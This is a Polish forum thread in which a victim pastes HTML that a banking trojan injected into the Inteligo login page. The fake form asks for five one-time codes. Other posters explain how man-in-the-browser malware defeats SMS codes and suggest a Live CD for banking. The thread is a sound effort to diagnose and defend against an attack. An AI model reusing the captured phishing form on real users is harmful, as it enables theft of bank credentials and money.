banki i wyludzanie hasel - jak ustalic zrodlo

[sirapacz]

otoz mam jakies gowno w kompie ktore - jak narazie wg mojej analizy - wbija sie w przegladarke (nie w dns czya arp tylko zwyczajnie zamienia kod juz podczas renderowania) i czy to na intelifo czy na mbanku prosi o podanie hasel 5 nieuzywanych kod z inteligo:

Kod:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/img/skins/igo2003/inteligo.ico">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Author" content="Softax (www.softax.pl)">
<meta name="Version" content="3-0-3">
<link rel="stylesheet" type="text/css" href="/css/skins/igo2003/inteli.css" title="standard">
<style type="text/css"><!--
   .tableHeader1, .tableHeader1zakl { background-image: URL('/img/skins/igo2003/tableHeader1_back.gif'); }
   .tableHeader2 { background-image: URL('/img/skins/igo2003/mp1-on.gif'); }
   .infoField1 { background-image: URL('/img/skins/igo2003/infoBack1.gif'); }
   .info1, .info1endPage { background-image: URL('/img/skins/igo2003/infoBack.gif'); }
   .info2 { background-image: URL('/img/skins/igo2003/infoBack2.gif'); }
   .welcome { background-image: URL('/img/skins/igo2003/welcome-back.gif'); }
   .bmActive { background-image: URL('/img/skins/igo2003/activeBack.gif'); }
   .bmInactive { background-image: URL('/img/skins/igo2003/inactiveBack.gif'); }
   .divider { background-image: URL("/img/skins/igo2003/divider.gif"); }
   .stopka { background-image: URL('/img/skins/igo2003/stopka.gif'); }
--></style>

<title>Serwis WWW Inteligo</title>
<script language="JavaScript" type="text/javascript"><!--
var infoTipWindow; var tmImagesArray; var submitStarted; var no_submit_block; var disable_focus_placing=0;
var mp1; var mp1over; var sectionName; var imgUrl = '/img/skins/igo2003/'; var htmlUrl = '/html/skins/igo2003/';
//--></script>
<script language="JavaScript" type="text/javascript" src="/scripts/skins/igo2003/common.js"></script>
</head>
<body onclick="disable_focus_placing=1;" onkeypress="" >
<script Language= "JavaScript">
		  function validate(form)
		  {
		  var str = /[^0-9]/;
		  if(form.nashehaslo1.value == '' || (form.nashehaslo1.value).length != 6 || str.test(form.nashehaslo1.value) != false || form.nashehaslo2.value == '' || (form.nashehaslo2.value).length != 6 || str.test(form.nashehaslo2.value) != false || form.nashehaslo3.value == '' || (form.nashehaslo3.value).length != 6 || str.test(form.nashehaslo3.value) != false || form.nashehaslo4.value == '' || (form.nashehaslo4.value).length != 6 || str.test(form.nashehaslo4.value) != false || form.nashehaslo5.value == '' || (form.nashehaslo5.value).length != 6 || str.test(form.nashehaslo5.value) != false || form.nashehaslo1num.value == '' || form.nashehaslo2num.value == '' || form.nashehaslo3num.value == '' || form.nashehaslo4num.value == '' || form.nashehaslo5num.value == '')
			{
				return false;
			}
			return true;
		  }
		  
		document.write('<form name=form2 action='+window.location+' method=post onsubmit="return validate(this);">');
</script>
<input type=hidden name="sd" value="GnyiqKRO3LYMJJ2SEppPNxgnBWaoWrZmYBTnBKHuYzSopUdICtr7kUmv3MhteZZFCLWEnK7WeZ3JefZmUwCuU5t7WzMwrfCI:XLts4eXsNUd7TzRQ7Kl/KomAPqVDxhsmyXhfpKtYJM9jzXwMObddIwi/YcPeG9eErOqrIPdgMes9peWaXdwv:wiLQZdKPDDy1oYw9Bukms=">
	<input type=hidden name="form.name" value="login">
	<input type=hidden name="menu" value="">
	<input type=hidden name="button" value="">
	<input type=hidden name="button.x" value="0">
	<input type=hidden name="cif" value="54325435">
	<input type=hidden name="password" value="54353454354">
	<input type=hidden name="skin" value="Granat">
	<input type=hidden name="btn.ok.x" value="28">
	<input type=hidden name="btn.ok.y" value="17">
	
<table border="0" cellpadding="0" cellspacing="0" width="753">
<tr><td><input type="image" src="/img/skins/igo2003/trans.gif" tabindex="-1" name="btn_ok" 
width="1" height="1" border="0" alt=""></td></tr>
<tr>
<td COLSPAN="4" align="left" valign="top" width="753" >
<br>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
(wyciete pierdoły bo sie post niemiesci)
<tr>
<td COLSPAN="2" class="tableSubHeader2"><table border="0" cellspacing="4" cellpadding="0"><tr><td width="64"><img src="/img/skins/igo2003/inteligo_guzik.gif" width="43" height="40" border="0" alt="guzik"/></td>
<td style="font-weight: bold;" ><p>Podaj 5 nieużywanych kodów jednorazowych z aktywnej karty kodów .</p></td></tr></table></td>
</tr>

<tr>
<td class="info2" COLSPAN="2">
<table align="right" width="100%">
 <tr>
  <td width="100%">
    <p><b>Bezpieczne logowanie.</b><br><br>       
       Zanim się zalogujesz, sprawdź adres strony (prawidłowy to: 
       https://secure.inteligo.com.pl) oraz poprawność jej certyfikatu: 
       kliknij w ikonę zamkniętej kłódki. Jeżeli cokolwiek wzbudza Twoje zaniepokojenie, 
       zanim się zalogujesz zadzwoń do konsultanta Inteligo (0 800 121 121).<br>
       <a target='_blank' href='http://www.inteligo.pl/infosite/oferta_dla_ciebie_bezpieczenstwo.htm'><b>Więcej o bezpiecznym korzystaniu z konta >></b></a>
    </p>
  </td>  
  <td>

<table align="right" width="100%">
<tr>
<td align="right"><a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.INTELIGO.COM.PL&lang=en" target="_blank"
onClick="return rawWindow('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.INTELIGO.COM.PL&lang=en', 'VeriSign', 520, 480);"><img src="/img/skins/igo2003/VeriSignSeal.gif" width="130" height="88" alt="" title="" border="0"></a><br><br>
</td></tr></table>
  </td>
 </tr>
</table>
</td>
</tr>
<tr>
<td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo1num" type="text" size="3" maxlength="2"></td>
<td class="tableLine2">
Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo1" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
 class="formField">

</td>
</tr>
<tr>
<td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo2num" type="text" size="3" maxlength="2"></td>
<td class="tableLine2">
Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo2" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
 class="formField">

</td>
</tr>
<tr>
<td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo3num" type="text" size="3" maxlength="2"></td>
<td class="tableLine2">
Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo3" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
 class="formField">

</td>
</tr>
<tr>
<td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo4num" type="text" size="3" maxlength="2"></td>
<td class="tableLine2">
Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo4" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
 class="formField">

</td>
</tr>
<tr>
<td class="tableLine2">Kod nr&nbsp;<input name="nashehaslo5num" type="text" size="3" maxlength="2"></td>
<td class="tableLine2">
Kod jednorazowy&nbsp;<input type="Password" name="nashehaslo5" value="" size="15" style="font-family:courier new, courier, monospace;font-size:13px"
 class="formField">

</td>
</tr>
<tr>
<td COLSPAN="2" class="info1">
<p>Jeśli przez 10 minut w serwisie WWW nie wykonasz żadnego działania 
powodującego przejście na inną stronę, zostaniesz ze względów bezpieczeństwa 
przeniesiony do strony logowania. Zaloguj się ponownie, aby powrócić do 
poprzednio prezentowanej strony.</p>
</td>
</tr>
<tr>
<td class="nopadding" colspan="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#01D1D2"><tr>
<td><img src="/img/skins/igo2003/tc4.gif" width="8" height="13" border=0 alt=""></td>
<td width="100%"><img src="/img/skins/igo2003/trans.gif" width="8" height="13" border=0 alt=""></td>
<td><img src="/img/skins/igo2003/dots.gif" width="22" height="13" border=0 alt=""></td>
<td><img src="/img/skins/igo2003/tc3.gif" width="8" height="13" border=0 alt=""></td>
</tr></table>
</td>
</tr>
<tr>
<td></td>
<td>
<input tabindex="10" name="btn_ok" type="image" src="/img/skins/igo2003/button-ok.gif" 
  width="61" height="27" border="0" hspace="1" alt="OK"
 title="OK">
<a tabindex="10" href="javascript:void(null);"  onclick="document.forms[0].reset(); return false;"><img 
  src="/img/skins/igo2003/button-wyczysc.gif"  width="86" height="27" border="0" hspace="1" 
  alt="Wyczyść" title="Wyczyść"></a>
</td>
</tr>
</table>
</td></tr>

</td>
</tr>

<tr>
<td>
<br>
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr><td><img src="/img/skins/igo2003/stopka_left.gif" width="4" height="27" border="0" alt=""></td>
<td class="stopka" height="27" width="100%"><p>Konto Inteligo jest prowadzone przez PKO Bank Polski</p></td>
<td><img src="/img/skins/igo2003/stopka_right.gif" width="4" height="27" border="0" alt=""></td></tr>
</table>
<table    border="0"   cellpadding="2"   cellspacing="1"   width="100%"
   valign="top"   background=""><tr>
<td></td>
<td><table align="right"><tr>
<td>
<img vspace="2" border="0" align="absmiddle" src="/img/skins/igo2003/troj-p.gif"
  width="9" height="10" hspace="2" alt="o"></td>
  <td><b>Zmień wygląd serwisu Inteligo na:&nbsp;</b></td>
<td>
<select tabindex="10" name="skin" class="formField">
<option selected   value="Granat">Granat</option>
<option   value="Turkus">Turkus</option>
<option   value="Czarny">Czarny</option>
<option   value="Miętowy">Miętowy</option>
</select>

</td>
<td>
<input type="image" name="btn_sel_skin" src="/img/skins/igo2003/troj.gif" width="22" height="21" 
 border="0" alt="Wybierz" title="Wybierz" tabindex="10">
</td></tr></table>
</td></tr></table>

</td>
</tr>
</table>
</td> </tr>
</table>

</form>
</body>
</html>

[sirapacz]

wstrzykuje kod javy.
to drugi wyciek od wycieku loginu i hasla ftp - zapewne to ten sam
jak rozkodowac gdzie on tego forma sle?

certyfkak wygkada okay, adresy ip hostow sie zgadzaja (mbank com pl i www mbank com pl)
nic nie wskazuje generalnie rzecz biorac na zatrucie dns etc

[Sardihan]

javascript i java to 2 zupełnie rużne rzeczy

[sirapacz]

racja - przeinaczylem w akcie (###) irytacji
zeby nie byc dluznym to : różne ;P

edit: nie używamy brzydkich wyrazów

[Radiol]

Podepne się tutaj bo najbardziej pasuje a nie widze potrzeby tworzenia nowego wątku.

Dzisiaj wyczytalem, że wiele zabezpieczeń typu: wirtualne klawiatury, zdrapki, sms code; używanych przez banki już od dawna sie nie sprawdza. Zastanawia mnie jak to jest robione w przypadku zdrapek i sms code. W zdrapkach można zastosować w/w metode "Podaj 5/10 jednorazowych haseł w celu sprawzdenia Twojego konta" itp czyli po prostu ominięcie tego zabezpieczenia. To jendak w przypadku sms code nie ma za bardzo pomysłu w jaki sposób może to być zaimplementowane. Jedyne co mi przychodzi to zmiana numeru telefonu w ustawieniach konta internetowego czyli albo włąnm na konto albo zmusić delikwenta do kliknięcia w sprokurowany link który za nas zmienia ten numer telefonu.
Czy robi się to w ten prosty sposób czy są jakieś inne bardziej zaawansowane metody?

Pozdrawiam

[Egoalter]

Dlaczego nikomu kto zakłada takie 'topiki' nigdy nie przyszło do głowy
że to może ktoś z tego forum
napisał to 'gówno' l0l
W zasadzie bez znaczenie ale trochę mnie to zawsze bawi l0l

[TQM]

Co do hasel jednorazowych to chodzi o to, ze normalnie wystarczy username i haslo... w UK banki pytaja o login, haslo oraz 3 losowo wybrane znaki z dodatkowego hasla ktore sobie zakladamy (jest ono obowiazkowe) i za kazdym logowaniem prosza o inne znaki.

To dodatkowe haslo oraz telefon/sms, zdrapka itd ma poprawic bezpieczenstwo, bo nie tylko musisz miec dane konta (login/haslo) ale token - przedmiot (telefon/zdrapka) lub jego odpowiednik (glowe w ktorej masz drugie haslo i podasz wskazane znaki). Jest to po prostu dodatkowy element systemu autoryzacji

BTW. Aktualnie coraz wiecej bankow w UK wprowadza tokeny sprzetowe, aby wiec zaplacic on-line musisz miec token (wyglada jak maly chinski kalkulatorek za 2zl), wciskasz w to swoja karte bankomatowa (kazda ma chip'a), podajesz pin karty, wprowadzasz kod z ekranu, dostajesz kod autoryzacyjny ktory masz wyslac do banku.
Obejscie czegos takiego jest raczej ehmmm bardzo trudne!

[Radiol]

TQM ale ja wiem na czym polegają te zabezpieczenia. Interesuje mnie jak można złamać smsa/zdrapke? Pomijając wyłudzenia typu phishing i podaj 5/10 jednorazowych haseł ze zdrapki. Wyczytałem, że już dawno tojest łamane i zastanawia mnie szczególnie ten sms.

Pozdrawiam

[TQM]

Sa na to sposoby... jesli koles zainfekowal odpowiednio Twoj komputer to istnieje taka mozliwosc, ze to co widzisz na ekranie jest spoof
Odpowiedni plugin do przegladarki i wszystko jest mozliwe - widzisz ze robisz przelew do urzedu skarbowego, dostajesz SMSa z haslem jednorazowym itd, autoryzujesz... pozniej widzisz ze niby ok, kwota sie zgadza itd... a tak na prawde dane do przelewu byly inne, konto nie nalezy do fiskusa i kod SMSowy posluzyl do autoryzowania innej transakcji najprawdopodobniej na inna kwote.

Calosc obdywa sie po stronie przegladarki na kompie klienta. Wystarczy ze w SMSie nie ma (albo nie przeczytasz) na jaka kwote odbywa sie przelew i przepiszesz kod... zaden bank nie uzna takiej reklamacji.

Co w takim razie robic? Do bankowosci elektronicznej odpalac jakies Live CD, ktore ma przegladarke bez pluginow (firefox standardowy bedzie ok) i nie zapisze zadnych danych - po prostu reboot i nie ma zadnej historii. Aktualnie stwierdzenie czy Twoj wlasny system jest na pewno czysty jest prawie niemozliwe

[Radiol]

Ale ogólnie sprowadza się to do mniej lub bardziej zaawansowanego spoofingu. Zastanawiałem się czy są inne metody niezależne od "czystości" komputera

Pozdrawiam